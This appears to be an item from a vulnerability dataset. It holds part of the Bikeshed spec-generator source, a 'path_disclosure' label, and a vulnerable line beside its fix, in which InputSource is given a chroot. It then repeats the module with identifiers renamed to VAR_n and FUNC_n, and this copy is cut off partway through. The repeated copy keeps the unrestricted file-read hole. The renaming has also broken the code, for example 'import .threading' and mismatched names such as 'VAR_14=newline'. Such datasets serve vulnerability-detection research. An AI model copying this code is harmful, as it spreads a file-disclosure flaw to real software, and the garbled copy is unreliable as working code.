def log_message(self, format, *args):
pass
socketserver.TCPServer.allow_reuse_address = True
server = socketserver.TCPServer(
("localhost" if localhost else "", port), SilentServer
)
print(f"Serving at port {port}")
thread = threading.Thread(target=server.serve_forever)
thread.daemon = True
thread.start()
else:
server = None
mdCommandLine = self.mdCommandLine
try:
self.preprocess()
self.finish(outputFilename)
lastInputModified = {
dep: dep.mtime() for dep in self.transitiveDependencies
}
p("==============DONE==============")
try:
while True:
# Comparing mtimes with "!=" handles when a file starts or
# stops existing, and it's fine to rebuild if an mtime
# somehow gets older.
if any(
input.mtime() != lastModified
for input, lastModified in lastInputModified.items()
):
resetSeenMessages()
p("Source file modified. Rebuilding...")
self.initializeState()
self.mdCommandLine = mdCommandLine
self.preprocess()
self.finish(outputFilename)
lastInputModified = {
dep: dep.mtime() for dep in self.transitiveDependencies
}
p("==============DONE==============")
time.sleep(1)
except KeyboardInterrupt:
p("Exiting~")
if server:
server.shutdown()
thread.join()
sys.exit(0)
except Exception as e:
die("Something went wrong while watching the file:\n{0}", e)
def fixText(self, text, moreMacros={}):
# Do several textual replacements that need to happen *before* the document is parsed as h.
# If markdown shorthands are on, remove all `foo`s while processing,
# so their contents don't accidentally trigger other stuff.
# Also handle markdown escapes.
if "markdown" in self.md.markupShorthands:
textFunctor = MarkdownCodeSpans(text)
else:
textFunctor = Functor(text)
macros = dict(self.macros, **moreMacros)
textFunctor = textFunctor.map(curry(replaceMacros, macros=macros))
textFunctor = textFunctor.map(fixTypography)
if "css" in self.md.markupShorthands:
textFunctor = textFunctor.map(replaceAwkwardCSSShorthands)
return textFunctor.extract()
def printTargets(self):
p("Exported terms:")
for el in findAll("[data-export]", self):
for term in config.linkTextsFromElement(el):
p(" " + term)
p("Unexported terms:")
for el in findAll("[data-noexport]", self):
for term in config.linkTextsFromElement(el):
p(" " + term)
def isOpaqueElement(self, el):
if el.tag in self.md.opaqueElements:
return True
if el.get("data-opaque") is not None:
return True
return False
def findImplicitInputFile():
"""
Find what input file the user *probably* wants to use,
by scanning the current folder.
In preference order:
1. index.bs
2. Overview.bs
3. the first file with a .bs extension
4. the first file with a .src.html extension
"""
if os.path.isfile("index.bs"):
return "index.bs"
if os.path.isfile("Overview.bs"):
return "Overview.bs"
allBs = glob.glob("*.bs")
if allBs:
return allBs[0]
allHtml = glob.glob("*.src.html")
if allHtml:
return allHtml[0]
return None
constants.specClass = Spec
styleColors = """
/* Any --*-text not paired with a --*-bg is assumed to have a transparent bg */
:root {
color-scheme: light dark;
--text: black;
--bg: white;
--unofficial-watermark: url(https://www.w3.org/StyleSheets/TR/2016/logos/UD-watermark);
--logo-bg: #1a5e9a;
--logo-active-bg: #c00;
--logo-text: white;
--tocnav-normal-text: #707070;
--tocnav-normal-bg: var(--bg);
--tocnav-hover-text: var(--tocnav-normal-text);
--tocnav-hover-bg: #f8f8f8;
--tocnav-active-text: #c00;
--tocnav-active-bg: var(--tocnav-normal-bg);
--tocsidebar-text: var(--text);
--tocsidebar-bg: #f7f8f9;
--tocsidebar-shadow: rgba(0,0,0,.1);
--tocsidebar-heading-text: hsla(203,20%,40%,.7);
--toclink-text: var(--text);
--toclink-underline: #3980b5;
--toclink-visited-text: var(--toclink-text);
--toclink-visited-underline: #054572;
--heading-text: #005a9c;
--hr-text: var(--text);
--algo-border: #def;
--del-text: red;
--del-bg: transparent;
--ins-text: #080;
--ins-bg: transparent;
--a-normal-text: #034575;
--a-normal-underline: #bbb;
--a-visited-text: var(--a-normal-text);
--a-visited-underline: #707070;
--a-hover-bg: rgba(75%, 75%, 75%, .25);
--a-active-text: #c00;
--a-active-underline: #c00;
--blockquote-border: silver;
--blockquote-bg: transparent;
--blockquote-text: currentcolor;
--issue-border: #e05252;
--issue-bg: #fbe9e9;
--issue-text: var(--text);
--issueheading-text: #831616;
--example-border: #e0cb52;
--example-bg: #fcfaee;
--example-text: var(--text);
--exampleheading-text: #574b0f;
--note-border: #52e052;
--note-bg: #e9fbe9;
--note-text: var(--text);
--noteheading-text: hsl(120, 70%, 30%);
--notesummary-underline: silver;
--assertion-border: #aaa;
--assertion-bg: #eee;
--assertion-text: black;
--advisement-border: orange;
--advisement-bg: #fec;
--advisement-text: var(--text);
--advisementheading-text: #b35f00;
--warning-border: red;
--warning-bg: hsla(40,100%,50%,0.95);
--warning-text: var(--text);
--amendment-border: #330099;
--amendment-bg: #F5F0FF;
--amendment-text: var(--text);
--amendmentheading-text: #220066;
--def-border: #8ccbf2;
--def-bg: #def;
--def-text: var(--text);
--defrow-border: #bbd7e9;
--datacell-border: silver;
--indexinfo-text: #707070;
--indextable-hover-text: black;
--indextable-hover-bg: #f7f8f9;
--outdatedspec-bg: rgba(0, 0, 0, .5);
--outdatedspec-text: black;
--outdated-bg: maroon;
--outdated-text: white;
--outdated-shadow: red;
--editedrec-bg: darkorange;
}"""
styleDarkMode = """
@media (prefers-color-scheme: dark) {
:root {
--text: #ddd;
--bg: black;
--unofficial-watermark: url("data:image/svg+xml,%3Csvg xmlns='http://www.w3.org/2000/svg' width='400' height='400'%3E%3Cg fill='%23100808' transform='translate(200 200) rotate(-45) translate(-200 -200)' stroke='%23100808' stroke-width='3'%3E%3Ctext x='50%25' y='220' style='font: bold 70px sans-serif; text-anchor: middle; letter-spacing: 6px;'%3EUNOFFICIAL%3C/text%3E%3Ctext x='50%25' y='305' style='font: bold 70px sans-serif; text-anchor: middle; letter-spacing: 6px;'%3EDRAFT%3C/text%3E%3C/g%3E%3C/svg%3E");
--logo-bg: #1a5e9a;
--logo-active-bg: #c00;
--logo-text: white;
--tocnav-normal-text: #999;
--tocnav-normal-bg: var(--bg);
--tocnav-hover-text: var(--tocnav-normal-text);
--tocnav-hover-bg: #080808;
--tocnav-active-text: #f44;
--tocnav-active-bg: var(--tocnav-normal-bg);
--tocsidebar-text: var(--text);
--tocsidebar-bg: #080808;
--tocsidebar-shadow: rgba(255,255,255,.1);
--tocsidebar-heading-text: hsla(203,20%,40%,.7);
--toclink-text: var(--text);
--toclink-underline: #6af;
--toclink-visited-text: var(--toclink-text);
--toclink-visited-underline: #054572;
--heading-text: #8af;
--hr-text: var(--text);
--algo-border: #456;
--del-text: #f44;
--del-bg: transparent;
--ins-text: #4a4;
--ins-bg: transparent;
--a-normal-text: #6af;
--a-normal-underline: #555;
--a-visited-text: var(--a-normal-text);
--a-visited-underline: var(--a-normal-underline);
--a-hover-bg: rgba(25%, 25%, 25%, .2);
--a-active-text: #f44;
--a-active-underline: var(--a-active-text);
--borderedblock-bg: rgba(255, 255, 255, .05);
--blockquote-border: silver;
--blockquote-bg: var(--borderedblock-bg);
--blockquote-text: currentcolor;
--issue-border: #e05252;
--issue-bg: var(--borderedblock-bg);
--issue-text: var(--text);
--issueheading-text: hsl(0deg, 70%, 70%);
--example-border: hsl(50deg, 90%, 60%);
--example-bg: var(--borderedblock-bg);
--example-text: var(--text);
--exampleheading-text: hsl(50deg, 70%, 70%);
--note-border: hsl(120deg, 100%, 35%);
--note-bg: var(--borderedblock-bg);
--note-text: var(--text);
--noteheading-text: hsl(120, 70%, 70%);
--notesummary-underline: silver;
--assertion-border: #444;
--assertion-bg: var(--borderedblock-bg);
--assertion-text: var(--text);
--advisement-border: orange;
--advisement-bg: #222218;
--advisement-text: var(--text);
--advisementheading-text: #f84;
--warning-border: red;
--warning-bg: hsla(40,100%,20%,0.95);
--warning-text: var(--text);
--amendment-border: #330099;
--amendment-bg: #080010;
--amendment-text: var(--text);
--amendmentheading-text: #cc00ff;
--def-border: #8ccbf2;
--def-bg: #080818;
--def-text: var(--text);
--defrow-border: #136;
--datacell-border: silver;
--indexinfo-text: #aaa;
--indextable-hover-text: var(--text);
--indextable-hover-bg: #181818;
--outdatedspec-bg: rgba(255, 255, 255, .5);
--outdatedspec-text: black;
--outdated-bg: maroon;
--outdated-text: white;
--outdated-shadow: red;
--editedrec-bg: darkorange;
}
/* In case a transparent-bg image doesn't expect to be on a dark bg,
which is quite common in practice... */
img { background: white; }
}"""
styleMdLists = """
/* This is a weird hack for me not yet following the commonmark spec
regarding paragraph and lists. */
[data-md] > :first-child {
margin-top: 0;
}
[data-md] > :last-child {
margin-bottom: 0;
}"""
styleAutolinks = """
.css.css, .property.property, .descriptor.descriptor {
color: var(--a-normal-text);
font-size: inherit;
font-family: inherit;
}
.css::before, .property::before, .descriptor::before {
content: "‘";
}
.css::after, .property::after, .descriptor::after {
content: "’";
}
.property, .descriptor {
/* Don't wrap property and descriptor names */
white-space: nowrap;
}
.type { /* CSS value <type> */
font-style: italic;
}
pre .property::before, pre .property::after {
content: "";
}
[data-link-type="property"]::before,
[data-link-type="propdesc"]::before,
[data-link-type="descriptor"]::before,
[data-link-type="value"]::before,
[data-link-type="function"]::before,
[data-link-type="at-rule"]::before,
[data-link-type="selector"]::before,
[data-link-type="maybe"]::before {
content: "‘";
}
[data-link-type="property"]::after,
[data-link-type="propdesc"]::after,
[data-link-type="descriptor"]::after,
[data-link-type="value"]::after,
[data-link-type="function"]::after,
[data-link-type="at-rule"]::after,
[data-link-type="selector"]::after,
[data-link-type="maybe"]::after {
content: "’";
}
[data-link-type].production::before,
[data-link-type].production::after,
.prod [data-link-type]::before,
.prod [data-link-type]::after {
content: "";
}
[data-link-type=element],
[data-link-type=element-attr] {
font-family: Menlo, Consolas, "DejaVu Sans Mono", monospace;
font-size: .9em;
}
[data-link-type=element]::before { content: "<" }
[data-link-type=element]::after { content: ">" }
[data-link-type=biblio] {
white-space: pre;
}"""
styleSelflinks = """
:root {
--selflink-text: white;
--selflink-bg: gray;
--selflink-hover-text: black;
}
.heading, .issue, .note, .example, li, dt {
position: relative;
}
a.self-link {
position: absolute;
top: 0;
left: calc(-1 * (3.5rem - 26px));
width: calc(3.5rem - 26px);
height: 2em;
text-align: center;
border: none;
transition: opacity .2s;
opacity: .5;
}
a.self-link:hover {
opacity: 1;
}
.heading > a.self-link {
font-size: 83%;
}
li > a.self-link {
left: calc(-1 * (3.5rem - 26px) - 2em);
}
dfn > a.self-link {
top: auto;
left: auto;
opacity: 0;
width: 1.5em;
height: 1.5em;
background: var(--selflink-bg);
color: var(--selflink-text);
font-style: normal;
transition: opacity .2s, background-color .2s, color .2s;
}
dfn:hover > a.self-link {
opacity: 1;
}
dfn > a.self-link:hover {
color: var(--selflink-hover-text);
}
a.self-link::before { content: "¶"; }
.heading > a.self-link::before { content: "§"; }
dfn > a.self-link::before { content: "#"; }
"""
styleDarkMode += """
@media (prefers-color-scheme: dark) {
:root {
--selflink-text: black;
--selflink-bg: silver;
--selflink-hover-text: white;
}
}
"""
styleCounters = """
body {
counter-reset: example figure issue;
}
.issue {
counter-increment: issue;
}
.issue:not(.no-marker)::before {
content: "Issue " counter(issue);
}
.example {
counter-increment: example;
}
.example:not(.no-marker)::before {
content: "Example " counter(example);
}
.invalid.example:not(.no-marker)::before,
.illegal.example:not(.no-marker)::before {
content: "Invalid Example" counter(example);
}
figcaption {
counter-increment: figure;
}
figcaption:not(.no-marker)::before {
content: "Figure " counter(figure) " ";
}"""
| path_disclosure | {
"code": [
" self.inputSource = InputSource(inputFilename)"
],
"line_no": [
61
]
} | {
"code": [
" self.inputSource = InputSource(inputFilename, chroot=constants.chroot)"
],
"line_no": [
61
]
} | import glob
import os
import sys
from collections import defaultdict
from functools import partial as curry
from . import (
biblio,
boilerplate,
caniuse,
conditional,
config,
constants,
datablocks,
dfns,
extensions,
fingerprinting,
h,
headings,
highlight,
idl,
includes,
inlineTags,
lint,
markdown,
mdnspeclinks,
metadata,
shorthands,
wpt,
)
from .func import Functor
from .h import *
from .InputSource import FileInputSource, InputSource
from .messages import *
from .refs import ReferenceManager
from .unsortedJunk import *
class CLASS_0:
def __init__(
self,
VAR_6,
VAR_7=False,
VAR_8=None,
VAR_9=False,
VAR_10=None,
VAR_11=False,
):
self.valid = False
self.lineNumbers = VAR_9
if VAR_9:
constants.dryRun = True
if VAR_6 is None:
VAR_6 = FUNC_0()
if VAR_6 is None: # still
die(
"No input file specified, and no *.bs or *.src.html files found in current directory.\nPlease specify an input file, or use - to pipe from STDIN."
)
return
self.inputSource = InputSource(VAR_6)
self.transitiveDependencies = set()
self.debug = VAR_7
self.token = VAR_8
self.testing = VAR_11
if VAR_10 is None:
self.dataFile = config.defaultRequester
else:
self.dataFile = VAR_10
self.md = None
self.mdBaseline = None
self.mdDocument = None
self.mdCommandLine = None
self.mdDefaults = None
self.mdOverridingDefaults = None
self.lines = []
self.document = None
self.html = None
self.head = None
self.body = None
self.fillContainers = None
self.valid = self.initializeState()
def FUNC_1(self):
self.normativeRefs = {}
self.informativeRefs = {}
self.refs = ReferenceManager(VAR_10=self.dataFile, VAR_11=self.testing)
self.externalRefsUsed = defaultdict(lambda: defaultdict(dict))
self.md = None
self.mdBaseline = metadata.MetadataManager()
self.mdDocument = None
self.mdCommandLine = metadata.MetadataManager()
self.mdDefaults = None
self.mdOverridingDefaults = None
self.biblios = {}
self.typeExpansions = {}
self.macros = defaultdict(lambda x: "???")
self.canIUse = {}
self.mdnSpecLinks = {}
self.widl = idl.getParser()
self.testSuites = json.loads(self.dataFile.fetch("test-suites.json", str=True))
self.languages = json.loads(self.dataFile.fetch("languages.json", str=True))
self.extraStyles = defaultdict(str)
self.extraStyles["style-colors"] = VAR_0
self.extraStyles["style-darkmode"] = VAR_1
self.extraStyles["style-md-lists"] = VAR_2
self.extraStyles["style-autolinks"] = VAR_3
self.extraStyles["style-selflinks"] = VAR_4
self.extraStyles["style-counters"] = VAR_5
self.extraScripts = defaultdict(str)
try:
VAR_31 = self.inputSource.read()
self.lines = VAR_31.lines
if VAR_31.date is not None:
self.mdBaseline.addParsedData("Date", VAR_31.date)
except FileNotFoundError:
die(
"Couldn't find the input file at the specified location '{0}'.",
self.inputSource,
)
return False
except OSError:
die("Couldn't open the input file '{0}'.", self.inputSource)
return False
return True
def FUNC_2(self, *VAR_12):
self.transitiveDependencies.update(VAR_12)
def FUNC_3(self):
self.transitiveDependencies.clear()
self.assembleDocument()
self.processDocument()
def FUNC_4(self):
stripBOM(self)
if self.lineNumbers:
self.lines = hackyLineNumbers(self.lines)
self.lines = markdown.stripComments(self.lines)
self.recordDependencies(self.inputSource)
self.lines, self.mdDocument = metadata.parse(lines=self.lines)
self.md = metadata.join(self.mdBaseline, self.mdDocument, self.mdCommandLine)
self.mdDefaults = metadata.fromJson(
data=config.retrieveBoilerplateFile(self, "defaults", error=True),
source="defaults",
)
self.md = metadata.join(
self.mdBaseline, self.mdDefaults, self.mdDocument, self.mdCommandLine
)
self.md.fillTextMacros(self.macros, doc=self)
VAR_22 = {k: json.dumps(v)[1:-1] for k, v in self.macros.items()}
VAR_23 = replaceMacros(
config.retrieveBoilerplateFile(self, "computed-metadata", error=True),
VAR_29=VAR_22,
)
self.mdOverridingDefaults = metadata.fromJson(
data=VAR_23, source="computed-metadata"
)
self.md = metadata.join(
self.mdBaseline,
self.mdDefaults,
self.mdOverridingDefaults,
self.mdDocument,
self.mdCommandLine,
)
self.md.computeImplicitMetadata(doc=self)
self.md.fillTextMacros(self.macros, doc=self)
self.md.validate()
extensions.load(self)
self.refs.initializeRefs(self)
self.refs.initializeBiblio()
self.lines = datablocks.transformDataBlocks(self, self.lines)
self.lines = markdown.parse(
self.lines,
self.md.indent,
opaqueElements=self.md.opaqueElements,
blockElements=self.md.blockElements,
)
self.refs.setSpecData(self.md)
self.html = "".join(line.text for line in self.lines)
boilerplate.addHeaderFooter(self)
self.html = self.fixText(self.html)
self.document = parseDocument(self.html)
self.head = find("head", self)
self.body = find("body", self)
correctH1(self)
includes.processInclusions(self)
metadata.parseDoc(self)
def FUNC_5(self):
conditional.processConditionals(self)
self.fillContainers = locateFillContainers(self)
lint.exampleIDs(self)
boilerplate.addBikeshedVersion(self)
boilerplate.addCanonicalURL(self)
boilerplate.addFavicon(self)
boilerplate.addSpecVersion(self)
boilerplate.addStatusSection(self)
boilerplate.addLogo(self)
boilerplate.addCopyright(self)
boilerplate.addSpecMetadataSection(self)
boilerplate.addAbstract(self)
boilerplate.addExpiryNotice(self)
boilerplate.addObsoletionNotice(self)
boilerplate.addAtRisk(self)
addNoteHeaders(self)
boilerplate.removeUnwantedBoilerplate(self)
wpt.processWptElements(self)
shorthands.run(self)
inlineTags.processTags(self)
canonicalizeShortcuts(self)
addImplicitAlgorithms(self)
fixManualDefTables(self)
headings.processHeadings(self)
checkVarHygiene(self)
processIssuesAndExamples(self)
idl.markupIDL(self)
inlineRemoteIssues(self)
addImageSize(self)
processBiblioLinks(self)
processDfns(self)
idl.processIDL(self)
dfns.annotateDfns(self)
formatArgumentdefTables(self)
formatElementdefTables(self)
processAutolinks(self)
biblio.dedupBiblioReferences(self)
verifyUsageOfAllLocalBiblios(self)
caniuse.addCanIUsePanels(self)
boilerplate.addIndexSection(self)
boilerplate.addExplicitIndexes(self)
boilerplate.addStyles(self)
boilerplate.addReferencesSection(self)
boilerplate.addPropertyIndex(self)
boilerplate.addIDLSection(self)
boilerplate.addIssuesSection(self)
boilerplate.addCustomBoilerplate(self)
headings.processHeadings(self, "all") # again
boilerplate.removeUnwantedBoilerplate(self)
boilerplate.addTOCSection(self)
addSelfLinks(self)
processAutolinks(self)
boilerplate.addAnnotations(self)
boilerplate.removeUnwantedBoilerplate(self)
mdnspeclinks.addMdnPanels(self)
highlight.addSyntaxHighlighting(self)
boilerplate.addBikeshedBoilerplate(self)
fingerprinting.addTrackingVector(self)
fixIntraDocumentReferences(self)
fixInterDocumentReferences(self)
removeMultipleLinks(self)
forceCrossorigin(self)
lint.brokenLinks(self)
lint.accidental2119(self)
lint.missingExposed(self)
lint.requiredIDs(self)
lint.unusedInternalDfns(self)
cleanupHTML(self)
if self.md.prepTR:
for VAR_19 in findAll("[rel ~= 'icon']", self):
removeNode(VAR_19)
for VAR_19 in findAll("link", self):
if VAR_19.get("href").startswith("https://www.w3.org/StyleSheets/TR"):
appendChild(find("head", self), VAR_19)
for VAR_19 in findAll("a", self):
VAR_35 = VAR_19.get("href", "")
if VAR_35.startswith("http://www.w3.org") or VAR_35.startswith(
"http://lists.w3.org"
):
VAR_19.set("href", "https" + VAR_35[4:])
VAR_17 = VAR_19.text or ""
if VAR_17.startswith("http://www.w3.org") or VAR_17.startswith(
"http://lists.w3.org"
):
VAR_19.text = "https" + VAR_17[4:]
extensions.BSPrepTR(self) # pylint: disable=no-member
return self
def FUNC_6(self):
try:
VAR_24 = h.Serializer(
self.md.opaqueElements, self.md.blockElements
).serialize(self.document)
except Exception as e:
die("{0}", e)
return
VAR_24 = finalHackyCleanup(VAR_24)
return VAR_24
def FUNC_7(self, VAR_13):
if VAR_13 is None:
if not isinstance(self.inputSource, FileInputSource):
VAR_13 = "-"
elif self.inputSource.sourceName.endswith(".bs"):
VAR_13 = self.inputSource.sourceName[0:-3] + ".html"
elif self.inputSource.sourceName.endswith(".src.html"):
VAR_13 = self.inputSource.sourceName[0:-9] + ".html"
else:
VAR_13 = "-"
return VAR_13
def FUNC_8(self, VAR_13=None, VAR_14=None):
self.printResultMessage()
VAR_13 = self.fixMissingOutputFilename(VAR_13)
VAR_24 = self.serialize()
if not constants.dryRun:
try:
if VAR_13 == "-":
sys.stdout.write(VAR_24)
else:
with open(
VAR_13, "w", encoding="utf-8", VAR_14=newline
) as f:
f.write(VAR_24)
except Exception as e:
die(
"Something prevented me from saving the output document to {0}:\n{1}",
VAR_13,
e,
)
def FUNC_9(self):
VAR_25 = messageCounts["fatal"]
VAR_26 = messageCounts["linkerror"]
VAR_27 = messageCounts["warning"]
if self.lineNumbers:
warn("Because --line-numbers was used, no output was saved.")
if VAR_25:
success("Successfully generated, but fatal errors were suppressed")
return
if VAR_26:
success("Successfully generated, with {0} linking errors", VAR_26)
return
if VAR_27:
success("Successfully generated, with warnings")
return
def FUNC_10(self, VAR_13, VAR_15=None, VAR_16=False):
import time
VAR_13 = self.fixMissingOutputFilename(VAR_13)
if self.inputSource.mtime() is None:
die(f"Watch mode doesn't support {self.inputSource}")
if VAR_13 == "-":
die("Watch mode doesn't support streaming to STDOUT.")
return
if VAR_15:
import http.server
import socketserver
import .threading
class CLASS_1(http.server.SimpleHTTPRequestHandler):
def FUNC_14(self, VAR_36, *VAR_37):
pass
socketserver.TCPServer.allow_reuse_address = True
VAR_32 = socketserver.TCPServer(
("localhost" if VAR_16 else "", VAR_15), CLASS_1
)
print(f"Serving at VAR_15 {port}")
VAR_33 = threading.Thread(target=VAR_32.serve_forever)
VAR_33.daemon = True
VAR_33.start()
else:
VAR_32 = None
VAR_28 = self.mdCommandLine
try:
self.preprocess()
self.finish(VAR_13)
VAR_34 = {
dep: dep.mtime() for dep in self.transitiveDependencies
}
p("==============DONE==============")
try:
while True:
if any(
input.mtime() != lastModified
for input, lastModified in VAR_34.items()
):
resetSeenMessages()
p("Source file modified. Rebuilding...")
self.initializeState()
self.mdCommandLine = VAR_28
self.preprocess()
self.finish(VAR_13)
VAR_34 = {
dep: dep.mtime() for dep in self.transitiveDependencies
}
p("==============DONE==============")
time.sleep(1)
except KeyboardInterrupt:
p("Exiting~")
if VAR_32:
server.shutdown()
VAR_33.join()
sys.exit(0)
except Exception as e:
die("Something went wrong while watching the file:\n{0}", e)
def FUNC_11(self, VAR_17, VAR_18={}):
if "markdown" in self.md.markupShorthands:
VAR_30 = MarkdownCodeSpans(VAR_17)
else:
VAR_30 = Functor(VAR_17)
VAR_29 = dict(self.macros, **VAR_18)
VAR_30 = VAR_30.map(curry(replaceMacros, VAR_29=macros))
VAR_30 = VAR_30.map(fixTypography)
if "css" in self.md.markupShorthands:
VAR_30 = VAR_30.map(replaceAwkwardCSSShorthands)
return VAR_30.extract()
def FUNC_12(self):
p("Exported terms:")
for VAR_19 in findAll("[data-export]", self):
for term in config.linkTextsFromElement(VAR_19):
p(" " + term)
p("Unexported terms:")
for VAR_19 in findAll("[data-noexport]", self):
for term in config.linkTextsFromElement(VAR_19):
p(" " + term)
def FUNC_13(self, VAR_19):
if VAR_19.tag in self.md.opaqueElements:
return True
if VAR_19.get("data-opaque") is not None:
return True
return False
def FUNC_0():
if os.path.isfile("index.bs"):
return "index.bs"
if os.path.isfile("Overview.bs"):
return "Overview.bs"
VAR_20 = glob.glob("*.bs")
if VAR_20:
return VAR_20[0]
VAR_21 = glob.glob("*.src.html")
if VAR_21:
return VAR_21[0]
return None
constants.specClass = CLASS_0
VAR_0 = """
/* Any --*-VAR_17 not paired with a --*-bg is assumed to have a transparent bg */
:root {
color-scheme: light dark;
--VAR_17: black;
--bg: white;
--unofficial-watermark: url(https://www.w3.org/StyleSheets/TR/2016/logos/UD-watermark);
--logo-bg: #1a5e9a;
--logo-active-bg: #c00;
--logo-VAR_17: white;
--tocnav-normal-VAR_17: #707070;
--tocnav-normal-bg: var(--bg);
--tocnav-hover-VAR_17: var(--tocnav-normal-VAR_17);
--tocnav-hover-bg: #f8f8f8;
--tocnav-active-VAR_17: #c00;
--tocnav-active-bg: var(--tocnav-normal-bg);
--tocsidebar-VAR_17: var(--VAR_17);
--tocsidebar-bg: #f7f8f9;
--tocsidebar-shadow: rgba(0,0,0,.1);
--tocsidebar-heading-VAR_17: hsla(203,20%,40%,.7);
--toclink-VAR_17: var(--VAR_17);
--toclink-underline: #3980b5;
--toclink-visited-VAR_17: var(--toclink-VAR_17);
--toclink-visited-underline: #054572;
--heading-VAR_17: #005a9c;
--hr-VAR_17: var(--VAR_17);
--algo-border: #def;
--del-VAR_17: red;
--del-bg: transparent;
--ins-VAR_17: #080;
--ins-bg: transparent;
--a-normal-VAR_17: #034575;
--a-normal-underline: #bbb;
--a-visited-VAR_17: var(--a-normal-VAR_17);
--a-visited-underline: #707070;
--a-hover-bg: rgba(75%, 75%, 75%, .25);
--a-active-VAR_17: #c00;
--a-active-underline: #c00;
--blockquote-border: silver;
--blockquote-bg: transparent;
--blockquote-VAR_17: currentcolor;
--issue-border: #e05252;
--issue-bg: #fbe9e9;
--issue-VAR_17: var(--VAR_17);
--issueheading-VAR_17: #831616;
--example-border: #e0cb52;
--example-bg: #fcfaee;
--example-VAR_17: var(--VAR_17);
--exampleheading-VAR_17: #574b0f;
--note-border: #52e052;
--note-bg: #e9fbe9;
--note-VAR_17: var(--VAR_17);
--noteheading-VAR_17: hsl(120, 70%, 30%);
--notesummary-underline: silver;
--assertion-border: #aaa;
--assertion-bg: #eee;
--assertion-VAR_17: black;
--advisement-border: orange;
--advisement-bg: #fec;
--advisement-VAR_17: var(--VAR_17);
--advisementheading-VAR_17: #b35f00;
--warning-border: red;
--warning-bg: hsla(40,100%,50%,0.95);
--warning-VAR_17: var(--VAR_17);
--amendment-border: #330099;
--amendment-bg: #F5F0FF;
--amendment-VAR_17: var(--VAR_17);
--amendmentheading-VAR_17: #220066;
--def-border: #8ccbf2;
--def-bg: #def;
--def-VAR_17: var(--VAR_17);
--defrow-border: #bbd7e9;
--datacell-border: silver;
--indexinfo-VAR_17: #707070;
--indextable-hover-VAR_17: black;
--indextable-hover-bg: #f7f8f9;
--outdatedspec-bg: rgba(0, 0, 0, .5);
--outdatedspec-VAR_17: black;
--outdated-bg: maroon;
--outdated-VAR_17: white;
--outdated-shadow: red;
--editedrec-bg: darkorange;
}"""
VAR_1 = """
@media (prefers-color-scheme: dark) {
:root {
--VAR_17: #ddd;
--bg: black;
--unofficial-watermark: url("data:image/svg+xml,%3Csvg xmlns='http://www.w3.org/2000/svg' width='400' height='400'%3E%3Cg fill='%23100808' transform='translate(200 200) rotate(-45) translate(-200 -200)' stroke='%23100808' stroke-width='3'%3E%3Ctext x='50%25' y='220' style='font: bold 70px sans-serif; VAR_17-anchor: middle; letter-spacing: 6px;'%3EUNOFFICIAL%3C/VAR_17%3E%3Ctext x='50%25' y='305' style='font: bold 70px sans-serif; VAR_17-anchor: middle; letter-spacing: 6px;'%3EDRAFT%3C/VAR_17%3E%3C/g%3E%3C/svg%3E");
--logo-bg: #1a5e9a;
--logo-active-bg: #c00;
--logo-VAR_17: white;
--tocnav-normal-VAR_17: #999;
--tocnav-normal-bg: var(--bg);
--tocnav-hover-VAR_17: var(--tocnav-normal-VAR_17);
--tocnav-hover-bg: #080808;
--tocnav-active-VAR_17: #f44;
--tocnav-active-bg: var(--tocnav-normal-bg);
--tocsidebar-VAR_17: var(--VAR_17);
--tocsidebar-bg: #080808;
--tocsidebar-shadow: rgba(255,255,255,.1);
--tocsidebar-heading-VAR_17: hsla(203,20%,40%,.7);
--toclink-VAR_17: var(--VAR_17);
--toclink-underline: #6af;
--toclink-visited-VAR_17: var(--toclink-VAR_17);
--toclink-visited-underline: #054572;
--heading-VAR_17: #8af;
--hr-VAR_17: var(--VAR_17);
--algo-border: #456;
--del-VAR_17: #f44;
--del-bg: transparent;
--ins-VAR_17: #4a4;
--ins-bg: transparent;
--a-normal-VAR_17: #6af;
--a-normal-underline: #555;
--a-visited-VAR_17: var(--a-normal-VAR_17);
--a-visited-underline: var(--a-normal-underline);
--a-hover-bg: rgba(25%, 25%, 25%, .2);
--a-active-VAR_17: #f44;
--a-active-underline: var(--a-active-VAR_17);
--borderedblock-bg: rgba(255, 255, 255, .05);
--blockquote-border: silver;
--blockquote-bg: var(--borderedblock-bg);
--blockquote-VAR_17: currentcolor;
--issue-border: #e05252;
--issue-bg: var(--borderedblock-bg);
--issue-VAR_17: var(--VAR_17);
--issueheading-VAR_17: hsl(0deg, 70%, 70%);
--example-border: hsl(50deg, 90%, 60%);
--example-bg: var(--borderedblock-bg);
--example-VAR_17: var(--VAR_17);
--exampleheading-VAR_17: hsl(50deg, 70%, 70%);
--note-border: hsl(120deg, 100%, 35%);
--note-bg: var(--borderedblock-bg);
--note-VAR_17: var(--VAR_17);
--noteheading-VAR_17: hsl(120, 70%, 70%);
--notesummary-underline: silver;
--assertion-border: #444;
--assertion-bg: var(--borderedblock-bg);
--assertion-VAR_17: var(--VAR_17);
--advisement-border: orange;
--advisement-bg: #222218;
--advisement-VAR_17: var(--VAR_17);
--advisementheading-VAR_17: #f84;
--warning-border: red;
--warning-bg: hsla(40,100%,20%,0.95);
--warning-VAR_17: var(--VAR_17);
--amendment-border: #330099;
--amendment-bg: #080010;
--amendment-VAR_17: var(--VAR_17);
--amendmentheading-VAR_17: #cc00ff;
--def-border: #8ccbf2;
--def-bg: #080818;
--def-VAR_17: var(--VAR_17);
--defrow-border: #136;
--datacell-border: silver;
--indexinfo-VAR_17: #aaa;
--indextable-hover-VAR_17: var(--VAR_17);
--indextable-hover-bg: #181818;
--outdatedspec-bg: rgba(255, 255, 255, .5);
--outdatedspec-VAR_17: black;
--outdated-bg: maroon;
--outdated-VAR_17: white;
--outdated-shadow: red;
--editedrec-bg: darkorange;
}
/* In case a transparent-bg image doesn't expect to be on a dark bg,
which is quite common in practice... */
img { background: white; }
}"""
VAR_2 = """
/* This is a weird hack for me not yet following the commonmark spec
regarding paragraph and lists. */
[data-md] > :first-child {
margin-top: 0;
}
[data-md] > :last-child {
margin-bottom: 0;
}"""
VAR_3 = """
.css.css, .property.property, .descriptor.descriptor {
color: var(--a-normal-VAR_17);
font-size: inherit;
font-family: inherit;
}
.css::before, .property::before, .descriptor::before {
content: "‘";
}
.css::after, .property::after, .descriptor::after {
content: "’";
}
.property, .descriptor {
/* Don't wrap property and descriptor names */
white-space: nowrap;
}
.type { /* CSS value <type> */
font-style: italic;
}
pre .property::before, pre .property::after {
content: "";
}
[data-link-type="property"]::before,
[data-link-type="propdesc"]::before,
[data-link-type="descriptor"]::before,
[data-link-type="value"]::before,
[data-link-type="function"]::before,
[data-link-type="at-rule"]::before,
[data-link-type="selector"]::before,
[data-link-type="maybe"]::before {
content: "‘";
}
[data-link-type="property"]::after,
[data-link-type="propdesc"]::after,
